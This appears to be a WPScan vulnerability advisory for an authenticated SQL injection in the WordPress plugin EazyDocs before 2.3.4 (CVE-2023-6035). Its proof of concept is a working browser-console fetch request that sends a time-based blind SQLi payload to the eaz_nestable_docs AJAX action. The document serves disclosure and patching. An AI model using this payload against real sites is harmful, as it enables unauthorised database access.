WordPress Plugin Vulnerabilities

EazyDocs < 2.3.4 - Subscriber + SQLi

Description

The plugin does not properly sanitize and escape "data" parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.

Proof of Concept

1. Create a document then create some sections in the document
2. Log in as Subscriber
3. Paste the following script in the browser's console, and notice it hangs for 5 seconds, indicating the injection succeeded:

```
await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
       "content-type": "application/x-www-form-urlencoded",
     },
    "body": "action=eaz_nestable_docs&data=%5b%7b%22id%22%3a%2286'and(select*from(select(sleep(5)))a)%23%22%7d%5d",
    "method": "POST",
    "mode": "cors"
});
```

Affects Plugins

Plugin icon
eazydocs
Fixed in 2.3.4

References

CVE
CVE-2023-6035
YouTube Video

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Dao Xuan Hieu
Submitter
Dao Xuan Hieu
Verified
Yes
WPVDB ID
44f5a29a-05f9-40d2-80f2-6fb2bda60d79

Timeline

Publicly Published
2023-11-20 (about 7 months ago)
Added
2023-11-20 (about 7 months ago)
Last Updated
2023-11-20 (about 7 months ago)

Other

Published
Title
Published
2014-08-01
Title
Link Library 5.0.8 - wp-content/plugins/link-library/tracker.php id Parameter SQL Injection
Published
2014-08-01
Title
Simple Retail Menus 4.0.1 - includes/mode-edit.php targetmenu Parameter SQL Injection
Published
2015-10-06
Title
Support Ticket System <= 1.2 - Unauthenticated SQL Injection
Published
2014-08-01
Title
Mukioplayer 1.6 - SQL Injection
Published
2014-08-01
Title
wp-forum - SQL Injection